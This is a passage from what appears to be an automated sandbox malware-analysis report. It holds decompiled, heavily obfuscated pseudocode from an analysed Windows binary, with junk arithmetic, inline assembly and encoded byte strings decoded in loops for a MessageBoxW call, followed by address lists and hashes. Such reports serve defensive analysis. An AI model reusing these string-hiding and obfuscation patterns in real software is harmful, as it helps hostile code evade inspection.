				intOrPtr _t342;
				signed int _t343;
				signed int _t344;
				signed short _t347;
				short _t355;
				signed int _t359;
				intOrPtr _t361;
				signed int _t364;
				signed int _t370;
				signed int _t381;
				WCHAR* _t382;
				signed int _t390;
				signed int _t391;
				signed int _t401;
				signed int _t412;
				signed int _t420;
				signed int _t424;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				void* _t432;
				void* _t449;

				asm("sbb dh, [esp+edx-0x68]");
				asm("cdq");
				_push(0xffffffab);
				if( *(_t432 - 0xa8) != 0x3b0) {
					 *(_t432 - 0x6c) =  *(_t432 - 0x6c) &  *0x1109ef0;
					 *(_t432 - 0x88) =  *(_t432 - 0x88) -  *(_t432 - 0x78) &  *(_t432 - 0x88);
					 *((char*)(_t432 - 0xfc)) = 0x97;
					 *((char*)(_t432 - 0xfb)) = 0xaf;
					 *((char*)(_t432 - 0xfa)) = 0xb7;
					 *((char*)(_t432 - 0xf9)) = 0xb9;
					 *((char*)(_t432 - 0xf8)) = 0xbc;
					 *((char*)(_t432 - 0xf7)) = 0xc3;
					 *((char*)(_t432 - 0xf6)) = 0x6a;
					 *((char*)(_t432 - 0xf5)) = 0xb0;
					 *((char*)(_t432 - 0xf4)) = 0xab;
					 *((char*)(_t432 - 0xf3)) = 0xbf;
					 *((char*)(_t432 - 0xf2)) = 0xb6;
					 *((char*)(_t432 - 0xf1)) = 0xbe;
					_t427 = 0;
					do {
						_t268 =  *0x1000cc0; // 0xffff970a
						if((_t268 |  *0x1000cc4) == 0) {
							_t342 =  *((intOrPtr*)(_t432 - 7));
							_t159 = _t342;
							asm("cdq");
							__eflags =  *0x1000cbc - _t342;
							if(__eflags < 0) {
								L10:
								_t160 = 0;
								__eflags = 0;
							} else {
								if(__eflags > 0) {
									L9:
									_t160 = 1;
								} else {
									__eflags =  *0x1000cb8 - _t159;
									if( *0x1000cb8 <= _t159) {
										goto L10;
									} else {
										goto L9;
									}
								}
							}
							__eflags =  !_t160;
							if( !_t160 == 0) {
								__eflags =  *0x1000ce0 |  *0x1000ce4;
								if(( *0x1000ce0 |  *0x1000ce4) != 0) {
									_t412 =  *(_t432 - 0x70) &  *0x1000ce0;
									 *0x1000ce0 = E00ECEE50(_t412, 0 &  *0x1000ce4,  *0x1000ce0,  *0x1000ce4);
									 *0x1000ce4 = _t412;
									 *0x1000cd8 =  *(_t432 - 0x40) * 0xffffe4ed;
									_t261 =  *0x1000d20 & 0xffffb755;
									__eflags = _t261;
									 *(_t432 - 0x5c) = _t261;
								}
							} else {
								 *0x1000c84 =  *0x1000c84 + 1;
							}
						} else {
							 *0x1000c84 = 0x9b;
							 *((char*)(_t432 - 8)) = 1;
						}
						_t343 =  *0x1000d08;
						_t272 =  *0x1000cf4; // 0x2b91c
						asm("cdq");
						_t344 =  *0x1000cf0; // 0xd43579fe
						 *(_t432 - 0xa8) = _t343;
						_t168 = E00ECEE50(_t344, _t272, 0x1faed387, 0);
						asm("sbb edx, edi");
						 *0x1000cf4 = 0;
						 *0x1000cf0 = 1;
						if((_t168 -  !( *(_t432 - 2) ^ _t343) | _t344) != 0) {
							 *0x1000cf0 = 0;
						}
						_t274 =  *0x1000ca4; // 0x9b27
						 *0x1000c90 = 0xb8f675f1 - ( *(_t432 - 1) & 0x000000ff);
						_t347 =  *0x1000cdc; // 0x84521e70
						_t427 = _t427 + 1;
						 *0x1000d10 = ( *(_t432 - 1) & 0x000000ff) *  *(_t432 - 0x6c) * ( *0x1000d08 - (0 | ( *(_t432 - 0x24) & 0x0000ffff) == 0x00000000)) * ((( *0x1000c83 & 0x000000ff) + 1) *  *0x1000cb4 +  !(_t274 + _t347));
						 *(_t432 + _t427 * 2 - 0x1ae) = ( *(_t432 + _t427 - 0xfd) & 0x000000ff) - 0x0000004a & 0x000000ff;
						 *0x1000d14 = 0;
					} while (_t427 < 0xc);
					_t355 = 0x92 - ( *(_t432 - 0xac) ^  *(_t432 - 0xb4));
					_t180 = M01000CB0; // 0x0
					 *((short*)(_t432 - 0x194)) = _t355;
					 *0x1000cc0 = 2;
					 *0x1000cc4 = 0;
					_t181 = E00ECEE50(_t180, 0, 0xbe790e28, 0x61b36);
					 *0x1000d1c = _t355;
					 *0x1000d18 = _t181;
					_t183 =  *0x1000cc0; // 0xffff970a
					_t287 =  *0x1000cc4; // 0xffffffff
					 *0x1000c94 =  *(_t432 - 0x1c) +  *(_t432 - 1) + 1;
					_t359 = _t183 | _t287;
					if(_t359 == 0) {
						_t361 = 1 -  *(_t432 - 0x78);
						asm("sbb eax, ecx");
						_t186 = E00ECEE50(_t361, 0,  *0x1000ca8,  *0x1000cac);
						 *0x1000cac = _t361;
						_t359 =  *0x1000c83 & 0x000000ff;
						M01000CB0 = M01000CB0 ^ _t359;
						__eflags = M01000CB0;
						 *0x1000ca8 = _t186;
					} else {
						if(_t183 != 1 || _t287 != 0) {
							if(_t183 == 2 && _t287 == 0) {
								 *((intOrPtr*)(_t432 - 0xbc)) = 0;
								if( *(_t432 - 0x24) != 0) {
									_t329 = 0;
									__eflags = 0;
								} else {
									_t329 = 1;
								}
								 *((intOrPtr*)(_t432 - 0xbc)) = 0;
								if( *((intOrPtr*)(_t432 - 0xb)) != 0) {
									_t251 = 0;
									__eflags = 0;
								} else {
									_t251 = 1;
								}
								 *(_t432 - 0x18) = ( *(_t432 - 0x78) - _t329) *  *0x1000d10 * _t251;
								asm("cdq");
								asm("sbb esi, edx");
								_t359 =  *(_t432 - 0x48);
								asm("sbb esi, eax");
								 *(_t432 - 0x48) =  *(_t432 - 0x48) -  *((intOrPtr*)(_t432 - 7)) - _t359;
							}
						} else {
							 *0x1000d18 =  *0x1215420;
							 *0x1000d1c = 0;
							 *(_t432 - 2) =  *(_t432 - 2) & 0x000000ff &  *(_t432 - 0x80) & 0x0000ffff |  *(_t432 - 2) & 0x000000ff;
							_t359 =  *0x10ae26c;
							 *0x1000d20 =  *0x1000d20 | _t359;
						}
					}
					 *((char*)(_t432 - 0xdc)) = 0xe5;
					 *((char*)(_t432 - 0xdb)) = 0xdd;
					 *((char*)(_t432 - 0xda)) = 0xe5;
					 *((char*)(_t432 - 0xd9)) = 0xe7;
					 *((char*)(_t432 - 0xd8)) = 0xea;
					 *((char*)(_t432 - 0xd7)) = 0xf1;
					_t189 = E00EC1190() & 0x000000ff;
					 *0x1000cd8 = _t189;
					if(_t189 > 0) {
						asm("cdq");
						 *0x1000d1c = 0;
						asm("adc edx, [0x1000cbc]");
						 *0x1000cc0 =  !(( *0x1000c83 & 0x000000ff) +  *0x1000cb8);
						 *0x1000cc4 =  !_t359;
						 *0x1000d18 =  *0x1215420;
						 *((intOrPtr*)(_t432 - 0x58)) =  *((intOrPtr*)(_t432 - 0x58)) + 1;
						asm("adc [ebp-0x54], ebx");
					}
					_t291 =  *(_t432 - 0x40);
					 *((intOrPtr*)(_t432 - 0x38)) = _t291 + _t291 + _t291 + _t291 + _t291 + _t291 + _t291 + _t291;
					 *(_t432 - 0x34) = ( *(_t432 - 0x3c) << 0x00000020 | _t291) << 3;
					 *0x10ae368 =  *((intOrPtr*)(_t432 - 0x38));
					_t428 = 0;
					do {
						_t364 =  *((intOrPtr*)(_t432 - 0xb));
						_t449 =  *0x1000c9b - _t364; // -28
						if(_t449 >= 0) {
							if( *(_t432 - 1) == 0) {
								_t193 =  *(_t432 - 0x6c);
								_t420 =  *(_t432 - 0x34);
								asm("cdq");
								__eflags = _t193 -  *((intOrPtr*)(_t432 - 0x38));
								if(_t193 !=  *((intOrPtr*)(_t432 - 0x38))) {
									L40:
									 *(_t432 - 0x90) =  *(_t432 - 0x40) +  *0x1000d10 +  *0x1000c84 -  *(_t432 - 1);
									 *(_t432 - 0x2c) =  *(_t432 - 0x2c) - ( *(_t432 - 0x2c) &  *0x1000cf0 & 0x0000ffff);
									 *0x1000ca0 =  *0x1000ca0 +  *(_t432 - 0x7c);
									 *0x1000c9e =  *0x1215420;
									 *0x1000c88 =  *0x1000c88 -  *(_t432 - 0x40);
									asm("sbb [0x1000c8c], eax");
								} else {
									__eflags = _t364 - _t420;
									if(_t364 == _t420) {
										_t321 =  *0x1000c88 |  *0x1000c8c;
										__eflags = _t321;
										 *_t321 =  *_t321 + _t193;
										__eflags =  *_t321;
										if( *_t321 != 0) {
											_t424 =  *(_t432 - 0x74);
											_t199 =  *0x1000c83 & 0x000000ff;
											asm("cdq");
											_t323 =  *(_t432 - 0x78) - _t199;
											__eflags = _t323;
											asm("enter 0xfa1b, 0x8b");
											_push(_t432);
											 *0x3DE8FE44 = _t323;
											 *(_t432 - 0x78) = _t323;
											 *(_t432 - 0x74) = _t424 & _t199;
											 *(_t432 - 0xa) = ( *(_t432 - 0xa) & 0x000000ff) + ( *(_t432 - 0x18) & 0x0000ffff);
											_t200 =  *((intOrPtr*)(_t432 - 4));
											 *0x1000cf0 = 0x73c571ff;
											_t328 = _t200 +  *0x1000cc8 + 1;
											__eflags = _t328;
											 *0x1000cd4 = _t328;
											 *0x1000cf4 = 0;
											_t201 = _t200 + 0x1000cf4;
											__eflags = _t201;
											 *_t328 =  *_t328 + _t201;
											 *_t201 =  *_t201 + _t201;
											 *_t201 =  *_t201 + _t201;
											__eflags =  *_t201;
										}
									} else {
										goto L40;
									}
								}
							} else {
								_t319 =  *0x1000d04; // 0xffffffff
								asm("cdq");
								_t203 =  *0x1000d00; // 0xfffff835
								_t401 = _t364 & _t319;
								 *0x1000d00 = E00ECEE50( *(_t432 - 0x1c) & _t203, _t401, _t203, _t319);
								 *0x1000d04 = _t401;
							}
						}
						 *(_t432 + _t428 * 2 - 0x160) = ( *(_t432 + _t428 - 0xdc) & 0x000000ff) + 0x00000068 & 0x000000ff;
						_t428 = _t428 + 1;
					} while (_t428 < 6);
					_t300 =  *0x1000d00; // 0xfffff835
					 *0x1000ce0 = 2;
					 *0x1000ce4 = 0;
					 *(_t432 - 0x70) = _t300 * 0x6eb594ba;
					_t302 =  *0x1000ce4; // 0x0
					 *0x110030c =  *(_t432 - 0x60);
					_t206 =  *0x1000ce0; // 0x0
					_t370 = _t206 | _t302;
					if(_t370 == 0) {
						 *((intOrPtr*)(_t432 - 0xbc)) = 0;
						__eflags =  *(_t432 - 6);
						if( *(_t432 - 6) != 0) {
							_t207 = 0;
							__eflags = 0;
						} else {
							_t207 = 1;
						}
						_t304 =  *0x1000d00 + _t207;
						__eflags = _t304;
						 *(_t432 - 0x24) =  !_t304;
					} else {
						if(_t206 != 1 || _t302 != 0) {
							if(_t206 == 2 && _t302 == 0) {
								_t235 =  *0x1000cdc; // 0x84521e70
								 *(_t432 - 0x60) = ( *(_t432 - 0x68) ^ _t235 ^  *0x1000d00) * (_t235 + 0xffffbb58);
								_t390 =  *0x1000c94; // 0x0
								_t391 = _t390 * 0x2d40daef;
								 *(_t432 - 0x7c) =  *(_t432 - 0x7c) * ( *0x1000cec & 0x0000ffff);
								 *(_t432 - 0x90) = _t391;
								asm("cdq");
								 *((intOrPtr*)(_t432 - 0x38)) = ( *(_t432 - 0x84) & 0x0000ffff) + ( *(_t432 - 0x84) & 0x0000ffff) + ( *(_t432 - 0x84) & 0x0000ffff) + ( *(_t432 - 0x84) & 0x0000ffff) + ( *(_t432 - 0x84) & 0x0000ffff) + ( *(_t432 - 0x84) & 0x0000ffff) + ( *(_t432 - 0x84) & 0x0000ffff) + ( *(_t432 - 0x84) & 0x0000ffff);
								 *(_t432 - 0x34) = _t391;
							}
						} else {
							asm("cdq");
							 *0x1000cb8 =  *((intOrPtr*)(_t432 - 4)) - 0x4fef3c23;
							 *0x1000cbc = _t370;
							 *((intOrPtr*)(_t432 - 0x4c)) =  *0x1215420;
							 *0x1000cd0 =  *0x1000cd0 +  *0x1000cd0 -  *0x1000ce0;
						}
					}
					 *((short*)(_t432 - 0x154)) =  ~(( *(_t432 - 0xc4) +  *((intOrPtr*)(_t432 - 0xa4))) *  *(_t432 - 0xc4) *  *(_t432 - 0x14) ^ 0x0000701c);
					_t209 = 0x20b;
					do {
						 *((char*)(_t432 - 0xb)) =  *((char*)(_t432 - 0xb)) + 1;
						_t209 = _t209 - 1;
					} while (_t209 > 0);
					_t212 = ( *(_t432 - 0x18) & 0x0000ffff |  *0x1000c9a) +  *0x1000c9f;
					 *0x1000c84 = 0;
					if(_t212 != 0) {
						_t429 = 0;
						__eflags = 0;
					} else {
						_t141 = _t212 + 1; // 0x20b
						_t429 = _t141;
					}
					asm("cdq");
					_t381 =  *(_t432 - 0x2c);
					asm("cdq");
					asm("adc edx, [0x1000cc4]");
					_t218 = E00ECEE50(( *(_t432 - 0x18) & 0x0000ffff) + ( *(_t432 - 0xc) & 0x000000ff) + 1,  *(_t432 - 0xc), _t381 +  *0x1000cc0, _t381);
					asm("sbb edx, edi");
					 *0x1000c83 = 1;
					if((_t218 - _t429 | _t381) != 0) {
						 *0x1000c83 = 0;
					}
					if( *0x1000c84 == 0) {
						 *(_t432 - 0x24) = 0x83;
						asm("cdq");
						 *0x1000cc8 = ( *(_t432 - 0x18) & 0x0000ffff) + 0xf;
						_t227 =  *0x1000cd0; // 0x0
						 *0x1000ccc = _t381;
						 *((char*)(_t432 - 5)) =  *((intOrPtr*)(_t432 - 3)) +  *((intOrPtr*)(_t432 - 0x28)) + (_t227 & 0x000000e4) - M01000CB0 +  *0x1000cb8 - 0x2d;
						asm("cdq");
						 *((intOrPtr*)(_t432 - 0xa0)) =  *((intOrPtr*)(_t432 - 0xa0)) -  *0x1000cd0 - 0x3811;
						asm("sbb [ebp-0x9c], edx");
					}
					_t154 = _t432 - 0x160; // 0x60f1ba1c
					_t382 = _t154;
					_t155 = _t432 - 0x1ac; // 0x60f1b9d0
					_t221 = _t155;
					MessageBoxW(GetForegroundWindow(), _t221, _t382, 0x10);
				}
				return 0;
			}





























































                                              0x00ec67ef
                                              0x00ec67f3
                                              0x00ec67f4
                                              0x00ec6822
                                              0x00ec682e
                                              0x00ec6847
                                              0x00ec684d
                                              0x00ec6854
                                              0x00ec685b
                                              0x00ec6862
                                              0x00ec6869
                                              0x00ec6870
                                              0x00ec6877
                                              0x00ec687e
                                              0x00ec6885
                                              0x00ec688c
                                              0x00ec6893
                                              0x00ec689a
                                              0x00ec68a1
                                              0x00ec68b0
                                              0x00ec68b0
                                              0x00ec68bc
                                              0x00ec68d1
                                              0x00ec68da
                                              0x00ec68dd
                                              0x00ec68de
                                              0x00ec68e0
                                              0x00ec68f5
                                              0x00ec68f5
                                              0x00ec68f5
                                              0x00ec68e2
                                              0x00ec68e2
                                              0x00ec68ee
                                              0x00ec68ee
                                              0x00ec68e4
                                              0x00ec68ea
                                              0x00ec68ec
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec68ec
                                              0x00ec68e2
                                              0x00ec68f9
                                              0x00ec68fb
                                              0x00ec690a
                                              0x00ec6910
                                              0x00ec6928
                                              0x00ec6931
                                              0x00ec693c
                                              0x00ec694b
                                              0x00ec6956
                                              0x00ec6956
                                              0x00ec695b
                                              0x00ec695b
                                              0x00ec68fd
                                              0x00ec68fd
                                              0x00ec68fd
                                              0x00ec68be
                                              0x00ec68be
                                              0x00ec68c8
                                              0x00ec68c8
                                              0x00ec6962
                                              0x00ec696c
                                              0x00ec6976
                                              0x00ec6981
                                              0x00ec6989
                                              0x00ec698f
                                              0x00ec699c
                                              0x00ec69a2
                                              0x00ec69a8
                                              0x00ec69b2
                                              0x00ec69b4
                                              0x00ec69b4
                                              0x00ec69d7
                                              0x00ec69dd
                                              0x00ec69e3
                                              0x00ec6a02
                                              0x00ec6a20
                                              0x00ec6a35
                                              0x00ec6a3d
                                              0x00ec6a3d
                                              0x00ec6a66
                                              0x00ec6a68
                                              0x00ec6a6f
                                              0x00ec6a76
                                              0x00ec6a80
                                              0x00ec6a86
                                              0x00ec6a8f
                                              0x00ec6a95
                                              0x00ec6aa3
                                              0x00ec6aac
                                              0x00ec6ab2
                                              0x00ec6aba
                                              0x00ec6abc
                                              0x00ec6b8a
                                              0x00ec6b91
                                              0x00ec6ba3
                                              0x00ec6ba8
                                              0x00ec6bae
                                              0x00ec6bb5
                                              0x00ec6bb5
                                              0x00ec6bbb
                                              0x00ec6ac2
                                              0x00ec6ac5
                                              0x00ec6ace
                                              0x00ec6ae0
                                              0x00ec6ae9
                                              0x00ec6af2
                                              0x00ec6af2
                                              0x00ec6aeb
                                              0x00ec6aeb
                                              0x00ec6aeb
                                              0x00ec6af7
                                              0x00ec6aff
                                              0x00ec6b08
                                              0x00ec6b08
                                              0x00ec6b01
                                              0x00ec6b01
                                              0x00ec6b01
                                              0x00ec6b1f
                                              0x00ec6b2f
                                              0x00ec6b32
                                              0x00ec6b34
                                              0x00ec6b3c
                                              0x00ec6b3e
                                              0x00ec6b41
                                              0x00ec6b49
                                              0x00ec6b57
                                              0x00ec6b65
                                              0x00ec6b6b
                                              0x00ec6b6e
                                              0x00ec6b76
                                              0x00ec6b76
                                              0x00ec6ac5
                                              0x00ec6bc2
                                              0x00ec6bc8
                                              0x00ec6bcf
                                              0x00ec6bd5
                                              0x00ec6bdc
                                              0x00ec6be3
                                              0x00ec6bef
                                              0x00ec6bf6
                                              0x00ec6bfc
                                              0x00ec6c05
                                              0x00ec6c0c
                                              0x00ec6c12
                                              0x00ec6c1a
                                              0x00ec6c26
                                              0x00ec6c2c
                                              0x00ec6c31
                                              0x00ec6c35
                                              0x00ec6c35
                                              0x00ec6c38
                                              0x00ec6c48
                                              0x00ec6c4b
                                              0x00ec6c54
                                              0x00ec6c59
                                              0x00ec6c60
                                              0x00ec6c60
                                              0x00ec6c63
                                              0x00ec6c69
                                              0x00ec6c74
                                              0x00ec6ca8
                                              0x00ec6cae
                                              0x00ec6cb1
                                              0x00ec6cb2
                                              0x00ec6cb4
                                              0x00ec6cba
                                              0x00ec6cd5
                                              0x00ec6ce9
                                              0x00ec6cf7
                                              0x00ec6cfd
                                              0x00ec6d05
                                              0x00ec6d0b
                                              0x00ec6cb6
                                              0x00ec6cb6
                                              0x00ec6cb8
                                              0x00ec6d19
                                              0x00ec6d19
                                              0x00ec6d1d
                                              0x00ec6d1d
                                              0x00ec6d1f
                                              0x00ec6d24
                                              0x00ec6d27
                                              0x00ec6d2e
                                              0x00ec6d2f
                                              0x00ec6d2f
                                              0x00ec6d30
                                              0x00ec6d34
                                              0x00ec6d35
                                              0x00ec6d3b
                                              0x00ec6d40
                                              0x00ec6d4d
                                              0x00ec6d50
                                              0x00ec6d5e
                                              0x00ec6d64
                                              0x00ec6d64
                                              0x00ec6d66
                                              0x00ec6d6d
                                              0x00ec6d6e
                                              0x00ec6d6e
                                              0x00ec6d71
                                              0x00ec6d73
                                              0x00ec6d75
                                              0x00ec6d75
                                              0x00ec6d75
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec6cb8
                                              0x00ec6c76
                                              0x00ec6c7d
                                              0x00ec6c83
                                              0x00ec6c86
                                              0x00ec6c8d
                                              0x00ec6c98
                                              0x00ec6c9d
                                              0x00ec6c9d
                                              0x00ec6c74
                                              0x00ec6e5d
                                              0x00ec6e65
                                              0x00ec6e66
                                              0x00ec6e6f
                                              0x00ec6e7d
                                              0x00ec6e87
                                              0x00ec6e8d
                                              0x00ec6e94
                                              0x00ec6e9d
                                              0x00ec6ea2
                                              0x00ec6ea9
                                              0x00ec6eab
                                              0x00ec6f65
                                              0x00ec6f6b
                                              0x00ec6f6d
                                              0x00ec6f76
                                              0x00ec6f76
                                              0x00ec6f6f
                                              0x00ec6f6f
                                              0x00ec6f6f
                                              0x00ec6f7e
                                              0x00ec6f7e
                                              0x00ec6f82
                                              0x00ec6eb1
                                              0x00ec6eb4
                                              0x00ec6ebd
                                              0x00ec6ed4
                                              0x00ec6ef3
                                              0x00ec6efa
                                              0x00ec6f03
                                              0x00ec6f09
                                              0x00ec6f0c
                                              0x00ec6f22
                                              0x00ec6f23
                                              0x00ec6f26
                                              0x00ec6f26
                                              0x00ec6f2b
                                              0x00ec6f36
                                              0x00ec6f37
                                              0x00ec6f4a
                                              0x00ec6f56
                                              0x00ec6f59
                                              0x00ec6f59
                                              0x00ec6eb4
                                              0x00ec6fa9
                                              0x00ec6fb0
                                              0x00ec6fb5
                                              0x00ec6fb5
                                              0x00ec6fb8
                                              0x00ec6fb9
                                              0x00ec6fd4
                                              0x00ec6fd6
                                              0x00ec6fdc
                                              0x00ec6fe3
                                              0x00ec6fe3
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6ff6
                                              0x00ec6ff9
                                              0x00ec7002
                                              0x00ec7009
                                              0x00ec7013
                                              0x00ec701a
                                              0x00ec701e
                                              0x00ec7025
                                              0x00ec7027
                                              0x00ec7027
                                              0x00ec7035
                                              0x00ec703c
                                              0x00ec704a
                                              0x00ec704b
                                              0x00ec7050
                                              0x00ec705d
                                              0x00ec7081
                                              0x00ec7084
                                              0x00ec7085
                                              0x00ec708b
                                              0x00ec708b
                                              0x00ec7091
                                              0x00ec7091
                                              0x00ec7097
                                              0x00ec7097
                                              0x00ec7872
                                              0x00ec7872
                                              0x00ec7880

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.423883840.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                              • Associated: 00000000.00000002.423879545.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424170838.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424177261.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424207782.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ec0000_5GPueTFF2S.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RPSQ8~$j
                                              • API String ID: 0-3780024997
                                              • Opcode ID: 18b4155caeacd6980a46b24d7a48adfb08f734ef4795929627a775d62c90f175
                                              • Instruction ID: fcbc8ed5f8239752cca8385ccf7a560cab03038272ff1a277cae0ea3767de473
                                              • Opcode Fuzzy Hash: 18b4155caeacd6980a46b24d7a48adfb08f734ef4795929627a775d62c90f175
                                              • Instruction Fuzzy Hash: 0BF1F7719042598ECB29CF68D950FFDBBB2AB55310F1481AEE4D9E7349DB3A4942CB10
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00EC6DDC Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 169COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 77%
                                              			E00EC6DDC(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __fp0) {
				intOrPtr _t81;
				signed int _t87;
				intOrPtr _t88;
				signed int _t89;
				signed int _t91;
				signed int _t94;
				signed char _t95;
				void* _t97;
				void* _t100;
				void* _t106;
				WCHAR* _t109;
				signed char _t116;
				signed short _t124;
				signed int _t136;
				signed int _t145;
				signed int _t146;
				signed int _t148;
				signed int _t150;
				signed int _t165;
				signed int _t167;
				signed int _t172;
				signed int _t174;
				signed int _t180;
				signed int _t191;
				WCHAR* _t192;
				signed int _t200;
				signed int _t201;
				signed int _t211;
				signed int _t213;
				signed int _t218;
				signed int _t220;
				signed int _t221;
				void* _t223;
				void* _t228;

				_t136 = __ebx - 1;
				asm("adc esp, [esi+ebx-0x22c51c7a]");
				asm("in al, 0x56");
				asm("cdq");
				asm("lodsb");
				asm("sbb al, 0xe7");
				asm("sbb ch, [esi+0x56812790]");
				do {
					__eflags = __al & 0x000000a7;
					__fp0 = __fp0 +  *((intOrPtr*)(__edi + __ebx));
					asm("in al, dx");
					do {
					} while (__eflags < 0);
					_t30 = __edx;
					__edx =  *__ecx;
					 *__ecx = _t30;
					_pop(__esp);
					asm("ror byte [ebx+esi*2+0x20], cl");
					asm("pushfd");
					asm("stosd");
					_pop(es);
				} while (__eflags > 0);
				__eflags = __eax & 0x2ac6074a;
				while(1) {
					 *(_t223 + _t220 * 2 - 0x160) = ( *(_t223 + _t220 - 0xdc) & 0x000000ff) + 0x00000068 & 0x000000ff;
					_t220 = _t220 + 1;
					if(_t220 < 6) {
						_t174 =  *((intOrPtr*)(_t223 - 0xb));
						_t228 =  *0x1000c9b - _t174; // -28
						if(_t228 >= 0) {
							if( *((intOrPtr*)(_t223 - 1)) == 0) {
								_t81 =  *((intOrPtr*)(_t223 - 0x6c));
								_t213 =  *(_t223 - 0x34);
								asm("cdq");
								__eflags = _t81 -  *((intOrPtr*)(_t223 - 0x38));
								if(_t81 !=  *((intOrPtr*)(_t223 - 0x38))) {
									L6:
									 *(_t223 - 0x90) =  *((intOrPtr*)(_t223 - 0x40)) +  *0x1000d10 +  *0x1000c84 -  *((intOrPtr*)(_t223 - 1));
									 *(_t223 - 0x2c) =  *(_t223 - 0x2c) - ( *(_t223 - 0x2c) &  *0x1000cf0 & 0x0000ffff);
									 *0x1000ca0 =  *0x1000ca0 +  *(_t223 - 0x7c);
									 *0x1000c9e =  *0x1215420;
									 *0x1000c88 =  *0x1000c88 -  *((intOrPtr*)(_t223 - 0x40));
									asm("sbb [0x1000c8c], eax");
								} else {
									__eflags = _t174 - _t213;
									if(_t174 == _t213) {
										_t165 =  *0x1000c88 |  *0x1000c8c;
										__eflags = _t165;
										 *_t165 =  *_t165 + _t81;
										__eflags =  *_t165;
										if( *_t165 != 0) {
											_t218 =  *(_t223 - 0x74);
											_t87 =  *0x1000c83 & 0x000000ff;
											asm("cdq");
											_t167 =  *(_t223 - 0x78) - _t87;
											__eflags = _t167;
											asm("enter 0xfa1b, 0x8b");
											_push(_t223);
											 *(_t136 - 0x35dc73bb) = _t167;
											 *(_t223 - 0x78) = _t167;
											 *(_t223 - 0x74) = _t218 & _t87;
											 *(_t223 - 0xa) = ( *(_t223 - 0xa) & 0x000000ff) + ( *(_t223 - 0x18) & 0x0000ffff);
											_t88 =  *((intOrPtr*)(_t223 - 4));
											 *0x1000cf0 = _t136;
											_t172 = _t88 +  *0x1000cc8 + 1;
											__eflags = _t172;
											 *0x1000cd4 = _t172;
											 *0x1000cf4 = 0;
											_t89 = _t88 + 0x1000cf4;
											__eflags = _t89;
											 *_t172 =  *_t172 + _t89;
											 *_t89 =  *_t89 + _t89;
											 *_t89 =  *_t89 + _t89;
											__eflags =  *_t89;
										}
									} else {
										goto L6;
									}
								}
							} else {
								_t145 =  *0x1000d04; // 0xffffffff
								asm("cdq");
								_t91 =  *0x1000d00; // 0xfffff835
								_t211 = _t174 & _t145;
								 *0x1000d00 = E00ECEE50( *(_t223 - 0x1c) & _t91, _t211, _t91, _t145);
								 *0x1000d04 = _t211;
							}
						}
						continue;
					}
					_t146 =  *0x1000d00; // 0xfffff835
					 *0x1000ce0 = 2;
					 *0x1000ce4 = 0;
					 *(_t223 - 0x70) = _t146 * 0x6eb594ba;
					_t148 =  *0x1000ce4; // 0x0
					 *0x110030c =  *(_t223 - 0x60);
					_t94 =  *0x1000ce0; // 0x0
					_t180 = _t94 | _t148;
					if(_t180 == 0) {
						 *((intOrPtr*)(_t223 - 0xbc)) = 0;
						__eflags =  *(_t223 - 6);
						if( *(_t223 - 6) != 0) {
							_t95 = 0;
							__eflags = 0;
						} else {
							_t95 = 1;
						}
						_t150 =  *0x1000d00 + _t95;
						__eflags = _t150;
						 *((short*)(_t223 - 0x24)) =  !_t150;
					} else {
						if(_t94 != 1 || _t148 != 0) {
							if(_t94 == 2 && _t148 == 0) {
								_t124 =  *0x1000cdc; // 0x84521e70
								 *(_t223 - 0x60) = ( *(_t223 - 0x68) ^ _t124 ^  *0x1000d00) * (_t124 + 0xffffbb58);
								_t200 =  *0x1000c94; // 0x0
								_t201 = _t200 * 0x2d40daef;
								 *(_t223 - 0x7c) =  *(_t223 - 0x7c) * ( *0x1000cec & 0x0000ffff);
								 *(_t223 - 0x90) = _t201;
								asm("cdq");
								 *((intOrPtr*)(_t223 - 0x38)) = ( *(_t223 - 0x84) & 0x0000ffff) + ( *(_t223 - 0x84) & 0x0000ffff) + ( *(_t223 - 0x84) & 0x0000ffff) + ( *(_t223 - 0x84) & 0x0000ffff) + ( *(_t223 - 0x84) & 0x0000ffff) + ( *(_t223 - 0x84) & 0x0000ffff) + ( *(_t223 - 0x84) & 0x0000ffff) + ( *(_t223 - 0x84) & 0x0000ffff);
								 *(_t223 - 0x34) = _t201;
							}
						} else {
							asm("cdq");
							 *0x1000cb8 =  *((intOrPtr*)(_t223 - 4)) - 0x4fef3c23;
							 *0x1000cbc = _t180;
							 *((intOrPtr*)(_t223 - 0x4c)) =  *0x1215420;
							 *0x1000cd0 =  *0x1000cd0 +  *0x1000cd0 -  *0x1000ce0;
						}
					}
					 *((short*)(_t223 - 0x154)) =  ~(( *(_t223 - 0xc4) +  *((intOrPtr*)(_t223 - 0xa4))) *  *(_t223 - 0xc4) *  *(_t223 - 0x14) ^ 0x0000701c);
					_t97 = 0x20b;
					do {
						 *((char*)(_t223 - 0xb)) =  *((char*)(_t223 - 0xb)) + 1;
						_t97 = _t97 - 1;
					} while (_t97 > 0);
					_t100 = ( *(_t223 - 0x18) & 0x0000ffff |  *0x1000c9a) +  *0x1000c9f;
					 *0x1000c84 = 0;
					if(_t100 != 0) {
						_t221 = 0;
						__eflags = 0;
					} else {
						_t63 = _t100 + 1; // 0x20b
						_t221 = _t63;
					}
					asm("cdq");
					_t191 =  *(_t223 - 0x2c);
					asm("cdq");
					asm("adc edx, [0x1000cc4]");
					_t106 = E00ECEE50(( *(_t223 - 0x18) & 0x0000ffff) + ( *(_t223 - 0xc) & 0x000000ff) + 1,  *(_t223 - 0xc), _t191 +  *0x1000cc0, _t191);
					asm("sbb edx, edi");
